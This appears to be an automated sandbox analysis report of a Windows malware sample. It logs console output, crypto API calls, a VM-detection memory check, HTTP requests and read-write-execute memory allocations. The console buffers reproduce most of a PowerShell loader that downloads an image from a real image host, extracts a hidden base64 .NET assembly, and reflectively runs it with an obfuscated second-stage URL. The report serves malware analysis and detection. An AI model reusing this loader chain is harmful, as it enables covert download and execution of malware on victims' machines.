WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: etString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6 console_handle: 0x00000157	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In console_handle: 0x00000163	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000016f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im console_handle: 0x0000017b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]: console_handle: 0x00000187	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly console_handle: 0x00000193	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = console_handle: 0x0000019f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkNCTi8wNTIvMjMuOTQyLjcyM console_handle: 0x000001ab	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: S44ODEvLzpwdHRo' , '' , '2' , 'regasm' , '6' , 'C:\Windows\Temp\', 'htmlcvg')) console_handle: 0x000001b7	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001c3	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001cf	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x0000001b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: At line:1 char:350 console_handle: 0x00000027	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/654/536/original/new_i console_handle: 0x00000033	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: mage.jpg?1698957750';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000003f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G console_handle: 0x0000004b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: etString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END> console_handle: 0x00000057	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: >';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.In console_handle: 0x00000063	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000006f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im console_handle: 0x0000007b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]: console_handle: 0x00000087	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly console_handle: 0x00000093	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = console_handle: 0x0000009f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkNCTi8wNTIvMjMuOTQyLjcyM console_handle: 0x000000ab	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: S44ODEvLzpwdHRo' , '' , '2' , 'regasm' , '6' , 'C:\Windows\Temp\', 'htmlcvg')) console_handle: 0x000000b7	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx console_handle: 0x000000c3	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00432f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00433408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00271998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00272398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00272398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00272398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00271a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00271a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00271a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00271a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00271a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 13, 2023, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00271a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 13, 2023, 10:55 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (2 events)

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET https://paste.ee/d/kWG9y

Allocates read-write-execute memory (usually to unpack itself) (50 out of 292 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02861000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02862000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02617000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02604000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02605000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02606000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02607000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02608000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02609000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05141000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
